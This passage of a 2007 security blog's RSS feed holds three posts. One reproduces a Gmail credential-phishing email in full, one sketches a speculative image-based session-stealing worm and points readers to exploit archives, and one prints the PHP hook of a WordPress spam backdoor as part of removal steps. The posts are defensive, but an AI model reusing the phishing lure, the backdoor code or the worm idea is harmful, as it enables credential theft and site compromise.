<p>What really bother me, is Microsoft Windows Setup API. Any downloaded Microsoft system files has embed sign-in digital signature. Windows installation will validate all setup file and logs out error if the file has a bad signature (third party signature or file being tempered). The flaw is within the Windows Setup API itself. It doesn&#8217;t protect you from installing bad programs. </p>
<p>You should thanks Microsoft developer for making good Installation Programs and reporting tools. it remind you of error but installed it nonetheless.</p>
<h2 class="sep">External Links</h2>
<ul class="xoxo nfo">
<li><a href="http://msdn.microsoft.com/library/default.asp?url=/library/en-us/syncmgr/syncmgr/about_system_event_notification_service.asp">MSDN System Event Notification Service (SENS)</a></li>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/security/vulnerability/how-to-disabled-and-removed-microsoft-windows-mobsync-trojan-rootkit/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Email Phishing and Spams Trends - Be wary</title>
		<link>http://42.kaizeku.com/security/vulnerability/email-phising-and-spam-trends/</link>
		<comments>http://42.kaizeku.com/security/vulnerability/email-phising-and-spam-trends/#comments</comments>
		<pubDate>Tue, 11 Dec 2007 14:09:28 +0000</pubDate>
		<dc:creator>Avice De'veréux</dc:creator>
		
		<category><![CDATA[Gmail]]></category>

		<category><![CDATA[vulnerability]]></category>

		<category><![CDATA[email]]></category>

		<category><![CDATA[Exploit]]></category>

		<category><![CDATA[Google]]></category>

		<category><![CDATA[jpeg+exploit]]></category>

		<category><![CDATA[microsoft]]></category>

		<category><![CDATA[millw0rm]]></category>

		<category><![CDATA[phishing]]></category>

		<category><![CDATA[tiff+exploit]]></category>

		<category><![CDATA[vx+heavens]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/vulnerability/email-phising-and-spam-trends/</guid>
		<description><![CDATA[<p><img src='http://gmodules.com/ig/proxy?url=http://www.shareapic.net/preview2/004669852.gif' alt='Google Gmail Logo' class="fl" width="130" height="54" />Below is typical phishing email I received on <cite style="background:#ffd;color:#000;padding: 1px 3px">Dec 8, 2007</cite>. It was send to one of my active gmail accounts. </p>

<dl class="xoxo r cb" style="list-style-type:none;width:98%;margin: 18px auto;border:1px solid #eee;padding:10px">
<dd>
<h2 class="cb" style="margin-top:9px;border-bottom: 1px solid #ccc">The Email Header</h2>
	<dl id="phising-email" class="profile cf cb">
	<dt class="fl cl" style="width:50px">From</dt>
	<dd><strong style="font-weight:400">"Gmail Team" &#60;customercareteamalert4@gmail.com&#62;</strong></dd>
	<dt class="fl cl" style="width:50px">Subject</dt>
		<dd><strong style="font-weight:400">Gmail Warning!!!! Verify Your Gmail Account To Avoid Close</strong>.</dd>
	<dt class="cl" style="border-top:1px solid#ccc;padding:9px 0px;margin-top:4px">Part of the message &#8595;</dt>
	<dd><blockquote cite="http://gmail.com/">
	<p> 
	Dear member,<br/>
	This message is from gmail message center to all gmail free account owners
	and premium account owners. We are currently upgrading our data base and
	e-mail account center. We are deleting all unused gmail account to create
	more space for new accounts.
	
	 *To prevent your account from closing, you will have to verify it below so
	that we will know that it's a present used account.*
	
	* CONFIRM YOUR IDENTITY. VERIFY YOUR FREE GMAIL ACCOUNT NOW !!! [...]</p>
	</blockquote>
	</dd>
	</dl>
</dd>
</dl>]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p><img src='http://gmodules.com/ig/proxy?url=http://www.shareapic.net/preview2/004669852.gif' alt='Google Gmail Logo' class="fl" width="130" height="54" />Below is typical phishing email I received on <cite style="background:#ffd;color:#000;padding: 1px 3px">Dec 8, 2007</cite>. It was send to one of my active gmail accounts. </p>
<p><span id="more-78"></span></p>
<dl class="xoxo r cb" style="list-style-type:none;width:511px;margin: 18px auto;border:1px solid #eee;padding:10px">
<dd>
<h2 class="cb" style="margin-top:9px;border-bottom: 1px solid #ccc">The Email Header</h2>
<dl id="phising-email" class="profile cf cb">
<dt class="fl cl" style="width:50px">From</dt>
<dd><strong style="font-weight:400">&#8220;Gmail Team&#8221; &lt;customercareteamalert4@gmail.com&gt;</strong></dd>
<dt class="fl cl" style="width:50px">Subject</dt>
<dd><strong style="font-weight:400">Gmail Warning!!!! Verify Your Gmail Account To Avoid Close</strong>.</dd>
<dt class="cl" style="border-top:1px solid#ccc;padding:9px 0px;margin-top:4px">Part of the message &darr;</dt>
<dd>
<blockquote cite="http://gmail.com/">
<p>
Dear member,<br/><br />
This message is from gmail message center to all gmail free account owners<br />
and premium account owners. We are currently upgrading our data base and<br />
e-mail account center. We are deleting all unused gmail account to create<br />
more space for new accounts.</p>
<p> *To prevent your account from closing, you will have to verify it below so<br />
that we will know that it&#8217;s a present used account.*</p>
<p>* CONFIRM YOUR IDENTITY. VERIFY YOUR FREE GMAIL ACCOUNT NOW !!! [...]</p>
</blockquote>
</dl>
<h3 class="cb">Raw Email Content</h3>
<p>This are part of of the raw message on gmail its not download via pop3. Certain meta info is not available as its got filtered by gmail services (spam automatic removal). </p>
<pre style="460px;height:300px;overflow:auto;border:1px solid #ccc">
Delivered-To random-victims-name@gmail.com
Received: by 10.114.235.19 with SMTP id i19cs230694wah;
 Sat, 8 Dec 2007 04:27:12 -0800 (PST)
Received: by 10.141.20.7 with SMTP id x7mr3231780rvi.1197116792300;
 Sat, 08 Dec 2007 04:26:32 -0800 (PST)
Received: by 10.141.115.15 with HTTP; Sat, 8 Dec 2007 04:26:32 -0800 (PST)
Message-ID: &lt;2f83b9150712080426n4a018c86mc2af4a4ed271f223@mail.gmail.com&gt;
Date: Sat, 8 Dec 2007 13:26:32 +0100
From: &quot;Gmail Team&quot; &lt;customercareteamalert4@gmail.com&gt;
Reply-To: customercareteamalert2@gmail.com
Subject: Gmail Warning!!!! Verify Your Gmail Account To Avoid Close.
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary=&quot;----=_Part_11145_31274162.1197116792293&quot;

------=_Part_11145_31274162.1197116792293
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

 Dear Member*,* **
 * Account Alert*
***
 *
 *VERIFY YOUR GMAIL ACCOUNT NOW TO AVOID CLOSE !!!*
***GMAI L
*Dear Member*,*
 This message is from gmail message center to all gmail free account owners
and premium account owners. We are currently upgrading our data base and
e-mail account center. We are deleting all unused gmail account to create
more space for new accounts.

 *To prevent your account from closing, you will have to verify it below so
that we will know that it's a present used account.*

* CONFIRM YOUR IDENTITY. VERIFY YOUR FREE GMAIL ACCOUNT NOW !!!

 &lt;http://amazon.com/&gt;
 Gmail! ID:.........................

 Password:........................

 Your Birthday:.................

 Your Country or Territory:...........
 Enter the Security
Characters:......... [image: Registration
Verification Code]
*

 *Warning!!! **Account owner that refuses to update his or her account
before two weeks of receiving this warning will lose his or her account
permanently. *
**
*Sincerely,*
*Gmail Team*

------=_Part_11145_31274162.1197116792293
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

&lt;table style=&quot;WIDTH: 595px; HEIGHT: 813px&quot; width=&quot;595&quot; border=&quot;0&quot;&gt;
&lt;tbody&gt;
&lt;tr bgcolor=&quot;#cccc99&quot;&gt;
&lt;td valign=&quot;center&quot; colspan=&quot;3&quot;&gt;&lt;font face=&quot;Arial,Helvetica&quot; color=&quot;#333300&quot; size=&quot;+0&quot;&gt;&lt;span style=&quot;FONT-SIZE: 13px; FONT-FAMILY: Arial&quot;&gt;Dear&amp;nbsp;&lt;font size=&quot;3&quot;&gt;Member&lt;/font&gt;&lt;strong&gt;,&lt;/strong&gt;&lt;/span&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;
&lt;td colspan=&quot;3&quot;&gt;&lt;font face=&quot;Arial,Helvetica&quot; size=&quot;-1&quot;&gt;
&lt;div align=&quot;center&quot;&gt;&lt;font face=&quot;Arial Cyr&quot; size=&quot;2&quot;&gt;&lt;span style=&quot;FONT-SIZE: 13px; FONT-FAMILY: Arial&quot;&gt;&lt;font face=&quot;Arial Cyr&quot; size=&quot;2&quot;&gt;&lt;font face=&quot;Arial Cyr&quot; size=&quot;2&quot;&gt;&lt;span style=&quot;FONT-SIZE: 23px; FONT-FAMILY: Arial&quot;&gt;&lt;b&gt;&lt;font color=&quot;#dd6600&quot;&gt;
&lt;img style=&quot;WIDTH: 430px; HEIGHT: 99px&quot; height=&quot;330&quot; src=&quot;http://www.google.com/intl/en/press/images/logos/gmail.jpg&quot; width=&quot;418&quot;&gt;&lt;/font&gt;&lt;/b&gt;&lt;/span&gt;&lt;/font&gt;&lt;/font&gt;&lt;/span&gt;&lt;/font&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot;&gt;
&lt;div&gt;&lt;font face=&quot;Arial Cyr&quot; size=&quot;2&quot;&gt;&lt;span style=&quot;FONT-SIZE: 13px; FONT-FAMILY: Arial&quot;&gt;&lt;font face=&quot;Arial Cyr&quot; size=&quot;2&quot;&gt;&lt;font face=&quot;Arial Cyr&quot; size=&quot;2&quot;&gt;&lt;span style=&quot;FONT-SIZE: 23px; FONT-FAMILY: Arial&quot;&gt;&lt;b&gt;&lt;u&gt;&lt;font color=&quot;#ff0000&quot;&gt;
&amp;nbsp;Account Alert&lt;/font&gt;&lt;/u&gt;&lt;/b&gt;&lt;/span&gt;&lt;/font&gt;&lt;/font&gt;&lt;/span&gt;&lt;/font&gt;&lt;/div&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot;&gt;&lt;font face=&quot;Arial Cyr&quot; size=&quot;2&quot;&gt;&lt;span style=&quot;FONT-SIZE: 13px; FONT-FAMILY: Arial&quot;&gt;&lt;font face=&quot;Arial Cyr&quot; size=&quot;2&quot;&gt;&lt;font face=&quot;Arial Cyr&quot; size=&quot;2&quot;&gt;&lt;span style=&quot;FONT-SIZE: 23px; FONT-FAMILY: Arial&quot;&gt;&lt;strong&gt;
&lt;/strong&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;&lt;font face=&quot;Arial&quot; color=&quot;#ff0000&quot;&gt;&lt;/font&gt;&lt;/u&gt;&lt;br&gt;&amp;nbsp; &lt;/b&gt;&lt;/font&gt;&lt;/font&gt;&lt;/span&gt;&lt;/font&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot;&gt;
&lt;table cellspacing=&quot;0&quot; cellpadding=&quot;4&quot; width=&quot;585&quot; border=&quot;0&quot;&gt;
&lt;tbody&gt;
&lt;tr bgcolor=&quot;#a0b8c8&quot;&gt;
&lt;td colspan=&quot;2&quot;&gt;
&lt;div align=&quot;center&quot;&gt;&lt;font face=&quot;Arial&quot;&gt;&lt;font face=&quot;Arial Narrow&quot; size=&quot;4&quot;&gt;&lt;u&gt;&lt;strong&gt;VERIFY YOUR GMAIL ACCOUNT NOW TO AVOID CLOSE&amp;nbsp;!!!&lt;/strong&gt;&lt;/u&gt;&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot;&gt;&lt;font face=&quot;Arial Cyr&quot; size=&quot;2&quot;&gt;&lt;font face=&quot;Arial Cyr&quot; size=&quot;2&quot;&gt;&lt;font face=&quot;Arial Cyr&quot; size=&quot;2&quot;&gt;&lt;strong&gt;&lt;font size=&quot;5&quot;&gt;&lt;font face=&quot;arial&quot;&gt;&lt;/font&gt;&lt;/font&gt;&lt;/strong&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;font face=&quot;Arial Cyr&quot; size=&quot;2&quot;&gt;
&lt;font face=&quot;Arial
 Cyr&quot; size=&quot;2&quot;&gt;&lt;font face=&quot;Arial Cyr&quot; size=&quot;2&quot;&gt;&lt;strong&gt;&lt;font face=&quot;Arial&quot;&gt;&lt;font size=&quot;7&quot;&gt;&lt;u&gt;&lt;font color=&quot;#0000bf&quot;&gt;G&lt;/font&gt;&lt;font color=&quot;#ff0000&quot;&gt;M&lt;/font&gt;&lt;font color=&quot;#ffff00&quot;&gt;A&lt;/font&gt;&lt;font color=&quot;#0000bf&quot;&gt;I&lt;/font&gt;&lt;font color=&quot;#007f40&quot;&gt;
 L&lt;/font&gt;&lt;/u&gt;&lt;/font&gt;&lt;/font&gt;&lt;br&gt;&lt;/strong&gt;&lt;span style=&quot;FONT-SIZE: 21px; FONT-FAMILY: Arial&quot;&gt;&lt;font color=&quot;#ff0000&quot;&gt;Dear&lt;/font&gt;&lt;font color=&quot;#ff0000&quot;&gt;&amp;nbsp;Member&lt;/font&gt;&lt;font color=&quot;#ff0000&quot;&gt;&lt;strong&gt;,&lt;/strong&gt;&lt;/font&gt;&lt;/span&gt;&lt;/font&gt;&lt;/font&gt;
 &lt;/font&gt;&lt;/div&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;font face=&quot;Arial Cyr&quot; color=&quot;#124282&quot; size=&quot;2&quot;&gt;&lt;span style=&quot;FONT-SIZE: 13px; FONT-FAMILY: Arial&quot;&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span style=&quot;FONT-SIZE: 10pt; COLOR: rgb(18,66,130); FONT-FAMILY: Arial&quot;&gt;&lt;font color=&quot;#0000ff&quot;&gt;&lt;span style=&quot;FONT-SIZE: 10pt; FONT-FAMILY: Arial&quot;&gt;&lt;font color=&quot;#00007f&quot;&gt;This message is from gmail message center to all&amp;nbsp;gmail free account owners and premium account owners. We are currently upgrading our data base and e-mail account center. We are deleting all unused&amp;nbsp;gmail account to create more space for new accounts.
&lt;/font&gt;&lt;/span&gt;&lt;/font&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span style=&quot;FONT-SIZE: 10pt; COLOR: rgb(18,66,130); FONT-FAMILY: Arial&quot;&gt;&lt;/span&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;MARGIN: 0in 0in 0pt&quot;&gt;&lt;font face=&quot;Times

 New

 Roman&quot;&gt;&lt;strong&gt;To prevent your account from closing, you will have to&amp;nbsp;verify it&amp;nbsp;below so that we will know that it&amp;#39;s a present used account.&lt;/strong&gt;&lt;/font&gt;&lt;/div&gt;&lt;span style=&quot;FONT-SIZE: 10pt; COLOR: rgb(18,66,130)&quot;&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span style=&quot;FONT-SIZE: 10pt; COLOR: rgb(18,66,130)&quot;&gt;&lt;/span&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;&lt;strong&gt;&lt;span style=&quot;FONT-SIZE: 10pt; COLOR: rgb(18,66,130); FONT-FAMILY: Arial&quot;&gt;
&lt;table cellspacing=&quot;0&quot; cellpadding=&quot;4&quot; width=&quot;585&quot; border=&quot;0&quot;&gt;
&lt;tbody&gt;
&lt;tr bgcolor=&quot;#a0b8c8&quot;&gt;
&lt;td colspan=&quot;2&quot;&gt;&lt;font size=&quot;4&quot;&gt;
&lt;div&gt;&lt;strong&gt;
&lt;font size=&quot;4&quot;&gt;
&lt;div&gt;&lt;strong&gt;CONFIRM YOUR IDENTITY. VERIFY YOUR FREE GMAIL ACCOUNT NOW !!!&lt;/strong&gt; &lt;/div&gt;&lt;/font&gt;&lt;/strong&gt;&lt;/div&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;
&lt;div&gt;&lt;strong&gt;&lt;font size=&quot;5&quot;&gt;&lt;font face=&quot;arial&quot;&gt;&amp;nbsp;
&lt;div&gt;
&lt;div&gt;&lt;img style=&quot;WIDTH: 469px; HEIGHT: 75px&quot; height=&quot;75&quot; src=&quot;http://pics.ebaystatic.com/aw/pics/securityCenter/hdr1_649x75.gif&quot; width=&quot;649&quot;&gt;&lt;/div&gt;
&lt;div&gt;&lt;font size=&quot;2&quot;&gt;&lt;font face=&quot;Verdana&quot;&gt;&lt;strong&gt;&lt;a href=&quot;http://amazon.com/&quot; target=&quot;_blank&quot; rel=&quot;nofollow&quot;&gt;&lt;span id=&quot;lw_1190759841_12&quot;&gt;&lt;font color=&quot;#003399&quot;&gt;&lt;/font&gt;&lt;/span&gt;&lt;/a&gt;&lt;/strong&gt;&lt;/font&gt;&lt;/font&gt;&amp;nbsp;&lt;/div&gt;&lt;/div&gt;&lt;/font&gt;
&lt;/font&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;div&gt;&lt;strong&gt;&lt;font size=&quot;5&quot;&gt;&lt;font face=&quot;arial&quot;&gt;&lt;font face=&quot;arial narrow&quot; size=&quot;4&quot;&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;MARGIN: 0in 0in 0pt&quot;&gt;&lt;strong&gt;&lt;span style=&quot;FONT-SIZE: 13.5pt&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;Gmail! ID:.........................&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;MARGIN: 0in 0in 0pt&quot;&gt;&lt;strong&gt;&lt;span style=&quot;FONT-SIZE: 13.5pt&quot;&gt;&lt;/span&gt;&lt;/strong&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;MARGIN: 0in 0in 0pt&quot;&gt;&lt;strong&gt;&lt;span style=&quot;FONT-SIZE: 13.5pt&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;Password:........................&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;MARGIN: 0in 0in 0pt&quot;&gt;&lt;strong&gt;&lt;span style=&quot;FONT-SIZE: 13.5pt&quot;&gt;&lt;/span&gt;&lt;/strong&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;MARGIN: 0in 0in 0pt&quot;&gt;&lt;font size=&quot;4&quot;&gt;&lt;font face=&quot;arial narrow&quot;&gt;&lt;strong style=&quot;FONT-FAMILY: arial narrow&quot;&gt;&lt;span style=&quot;FONT-SIZE: 13.5pt&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Your Birthday:.................&lt;/span&gt;&lt;/strong&gt;
 &lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;MARGIN: 0in 0in 0pt&quot;&gt;&lt;font size=&quot;4&quot;&gt;&lt;font face=&quot;arial
 narrow&quot;&gt;&lt;strong style=&quot;FONT-FAMILY: arial narrow&quot;&gt;&lt;span style=&quot;FONT-SIZE: 13.5pt&quot;&gt;&lt;/span&gt;&lt;/strong&gt;&lt;/font&gt;&lt;/font&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;MARGIN: 0in 0in 0pt&quot;&gt;&lt;strong&gt;&lt;span style=&quot;FONT-SIZE: 13.5pt&quot;&gt;&lt;label for=&quot;persistent&quot;&gt;&lt;/label&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Your Country or Territory:...........&lt;/span&gt;&lt;/strong&gt; &lt;/div&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/strong&gt;
&lt;/div&gt;
&lt;div&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;Enter the &lt;strong&gt;Security Characters:.........&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;img style=&quot;WIDTH: 125px; HEIGHT: 38px&quot; alt=&quot;Registration Verification Code&quot; src=&quot;https://ab.login.yahoo.com/img/LVnEpeVZFekTjDHcj06RTVxEZ3._lwVb0bZmRLXJUxldX3JOnZnejReq4nmXD_..xGmoMjBT9h9WFcSARc5o427WyZP6hQ1z1juqhTkOyV68FA04yd2HiHVj.jpg&quot; border=&quot;0&quot;&gt;
 &lt;/strong&gt;&lt;/div&gt;&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span style=&quot;FONT-SIZE: 10pt; COLOR: rgb(18,66,130); FONT-FAMILY: Arial&quot;&gt;&lt;/span&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span style=&quot;FONT-SIZE: 10pt; COLOR: rgb(18,66,130); FONT-FAMILY: Arial&quot;&gt;&lt;img style=&quot;WIDTH: 148px; HEIGHT: 53px&quot; height=&quot;139&quot; src=&quot;http://www.genbeta.com/images/2007/01/gmail%20logo%20blanco.gif&quot; width=&quot;118&quot;&gt;
 &lt;/span&gt;&lt;/div&gt;
&lt;div&gt;&lt;strong&gt;&lt;span style=&quot;FONT-SIZE: 12pt; COLOR: red; FONT-FAMILY: Arial&quot;&gt;Warning!!! &amp;nbsp;&lt;/span&gt; &lt;/strong&gt;&lt;strong&gt;&lt;span style=&quot;FONT-SIZE: 12pt; COLOR: black&quot;&gt;Account owner that refuses to update his or her account before two weeks of receiving this warning will lose his or her account permanently.
&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;div&gt;&lt;strong&gt;&lt;span style=&quot;FONT-SIZE: 12pt; COLOR: black&quot;&gt;&lt;/span&gt;&lt;/strong&gt;&amp;nbsp;&lt;/div&gt;
&lt;div&gt;&lt;strong&gt;&lt;span style=&quot;FONT-SIZE: 12pt; COLOR: black&quot;&gt;Sincerely,&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;div&gt;&lt;strong&gt;&lt;span style=&quot;FONT-SIZE: 12pt; COLOR: black&quot;&gt;Gmail Team&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;&lt;/span&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;

------=_Part_11145_31274162.1197116792293--
</pre>
<dt style="margin-bottom:10px">
They used Outlook to published this email and leeched numbers of images across different &#8220;known&#8221; web services &darr;</dt>
<dd class="title" style="border-bottom:1px dotted #ccc"><span class="fl" style="width:100px">Image</span> <span>Sources</span></dd>
<dd class="cl"><span class="fl" style="width:100px"> Gmail Logo: </span> <a href="http://www.google.com/intl/en/press/images/logos/gmail.jpg">Google Presskit logo</a></dd>
<dd class="fl"><span class="fl" style="width:100px">Captcha :</span> <a href="https://ab.login.yahoo.com/img/LVnEpeVZFekTjDHcj06RTVxEZ3._lwVb0bZmRLXJUxldX3JOnZnejReq4nmXD_..xGmoMjBT9h9WFcSARc5o427WyZP6hQ1z1juqhTkOyV68FA04yd2HiHVj.jpg">yahoo (SSL)</a></dd>
<dd class="cl"><span class="fl" style="width:100px">Gmail Logo 2:</span> <a href="http://www.genbeta.com/images/2007/01/gmail%20logo%20blanco.gif">genbeta.com</a> (might be their host)</dd>
<dd class="cl"><span class="fl" style="width:100px">Header:</span> <a href="http://pics.ebaystatic.com/aw/pics/securityCenter/hdr1_649x75.gif">EbayStatic Server</a></dd>
</dl>
<h2>Whats the motiff</h2>
<p>It may seem funny to read the message as this are pretty much a script kiddies at work. I&#8217;m sure that most savvy users will not trust this types of threat. But what most people unaware of is the &#8220;Image&#8221; portions of the message. It can play a big role for expoiting email.</p>
<p class="note" style="padding:10px;margin:10px;width:85%;border:1px solid #eee"><span style="font-weight:700">QuickInfo:</span> Spam &#8220;images&#8221; trends start around <a href="http://www.ironport.com/">june 2006</a> and earlier version of popular email client (Outlook and Thunderbird) doesn&#8217;t block images by default. </p>
<p> If you are familliar with Internet Security in general,you may notice that there is many attemp and proof of concept method in exploiting Images like &#8220;<a href="http://blog.kakkoi.net/uri/aHR0cDovL21pbHcwcm0ub3JnL2V4cGxvaXRzLzQ2MTY.curie,80,302" rel="external nofollow" title="Tiff Exploit Sources at Milw0rm">TIFF</a> &#038; <a href="http://www.google.com/search?q=microsoft+jpeg+exploit" rev="google:query" rel="external">JPEG</a>&#8220;. Both of this vulnurebilities exists in Internet Explorer Browser and various microsoft windows products. While we can only make educated guesses as there is no real working proof yet.</p>
<p><tt>My doodling scenario produce this &darr;</tt></p>
<p class="note" style="padding:10px;margin:10pxl;background-color:#f9f9f9;width:95%"> Session &#8220;hacker&#8221; create a malicious server side image &rarr; proxy tunnel send to multiple email server &rarr; the curious victim open the email &rarr; steal client informations (cookie or server session cookie) &rarr; spoof the request &rarr; send RST back to client (reset) &rarr; dump the victims data in one instance. &rarr; write signature on victim email (avoid loop) &rarr; propogate using victims session &rarr; new net-worm is born</p>
<p> Try <abbr title="search">digging</abbr> around <strong>VX Heavens</strong> &#038; <strong>milw0rm</strong> Database you&#8217;ll find something to start thinkering.</p>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/security/vulnerability/email-phising-and-spam-trends/feed/</wfw:commentRss>
		</item>
		<item>
		<title>How to remove wordpress.net.in spams</title>
		<link>http://42.kaizeku.com/wordpress/how-to-removed-wordpress-net-in-spam-injection-infected-by-mike-jagger-goro-class-mailphp/</link>
		<comments>http://42.kaizeku.com/wordpress/how-to-removed-wordpress-net-in-spam-injection-infected-by-mike-jagger-goro-class-mailphp/#comments</comments>
		<pubDate>Fri, 30 Nov 2007 09:06:54 +0000</pubDate>
		<dc:creator>Avice De'veréux</dc:creator>
		
		<category><![CDATA[WordPress]]></category>

		<category><![CDATA[injection]]></category>

		<category><![CDATA[vulnerability]]></category>

		<category><![CDATA[backdoor]]></category>

		<category><![CDATA[cloacking]]></category>

		<category><![CDATA[default-filters]]></category>

		<category><![CDATA[goro]]></category>

		<category><![CDATA[spam]]></category>

		<category><![CDATA[web+sniffer]]></category>

		<category><![CDATA[xmlrpc]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/wordpress/how-to-removed-wordpress-spam-injection-infected-by-mike-jagger-goro-class-mailphp/</guid>
		<description><![CDATA[

I found this while browsing WordPress support forum, some of these victims update their default_filters.php and upload class-mail.php inside their WordPress without being aware that it&#8217;s a backdoor (wordpress.net.in). There is no class-mail.php in WordPress except class-phpmailer.php. So don&#8217;t get confuse by it.
Below is a quick workaround on how you can removed the offending goro [...]]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p><img src='http://blog.kakkoi.net/wp-content/uploads/2008/03/wordpress-blackhat-seo-spam.png' alt='wordpress-blackhat-seo-spam.png image by chaoskaizer' width="128" height="128" longdesc="http://blog.kakkoi.net/wordpress/how-to-removed-wordpress-net-in-spam-injection-infected-by-mike-jagger-goro-class-mailphp/" class="photo thumb- fl" />I found this while browsing WordPress support forum, some of these victims update their <strong>default_filters.php</strong> and upload <tt class="di">class-mail.php</tt> inside their WordPress without being aware that it&#8217;s a <a href="http://en.wikipedia.org/wiki/Backdoor_%28computing%29" class="exturl icn-r1">backdoor</a> (wordpress.net.in). There is no <strong>class-mail.php</strong> in WordPress except <strong>class-phpmailer.php</strong>. So don&#8217;t get confuse by it.</p>
<p>Below is a quick workaround on how you can removed the offending <strong class="fw-">goro</strong> spamware injection before Google banned you from the internet pipes.</p>
<p><span id="more-51"></span></p>
<h2 class="cb mgt mgb-">Workaround</h2>
<ul class="xoxo exturl pdt">
<li>For temporary disable remote include in <tt class="di">php.ini</tt> settings.
<pre class="prebox">
;;;;;;;;;;;;;;;;;;
; Fopen wrappers ;
;;;;;;;;;;;;;;;;;;

; Whether to allow the treatment of URLs (like http:// or ftp://) as files.
allow_url_fopen = off
allow_url_include = off
</pre>
</li>
<li>Check your <em>.htaccess</em> for suspicious redirect.</li>
<li>Find <strong>class-mail.php</strong> inside <tt class="di">&#8220;*/wp-includes/&#8221;</tt> directory and removed it.</li>
<li>Find the following code inside <tt class="di">&#8220;*/wp-includes/default_filters.php&#8221;</tt> and removed it
<pre class="prebox">
add_action('wp_footer','wpc7c16b8466d864eeefd20050625c7775');
function wpc7c16<>b8466d864eeefd20050625c7775() {
@include('./wp-includes/class-mail.php');
if(sizeof($wparr)>0){
echo "!div id=\"goro\"!";
foreach($wparr as $k=>$v){
echo "“.ucwords($v[’key’]).”\n”;
if($i++==$inum) break;
}
echo “!/div!”.$_footer;
}
}
</pre>
</li>
<li>
<h3>Robots.txt Exclusion</h3>
<p><span class="fw">Optional</span> - Prevent googlebot from indexing the static spam page.<br />
Login to <tt class="di">Wordpress Admin > Manage > Files > Other Files</tt> &rarr; Key in &#8220;Robots.txt&#8221;. Add the following code.</p>
<pre class="prebox">
User-agent: Googlebot
Disallow: /*?*
Disallow: /*?
</pre>
<p>Refer <a href="http://blog.kakkoi.net/robots.txt" class="inturl icn-r1">robots.txt</a>.
</li>
</ul>
<h2>Possible WordPress class (suspicious) files that would be tempered</h2>
<p>Md5 checksum the following files, compare it with official versions from <a href="http://wordpress.org/download/release-archive/" class="exturl icn-r1">WordPress Release Archive</a>.</p>
<ul class="xoxo exturl">
<li><a href="http://xref.redalt.com/wptrunk/wp-includes/wp-db.php.source.htm">wp-db.php</a></li>
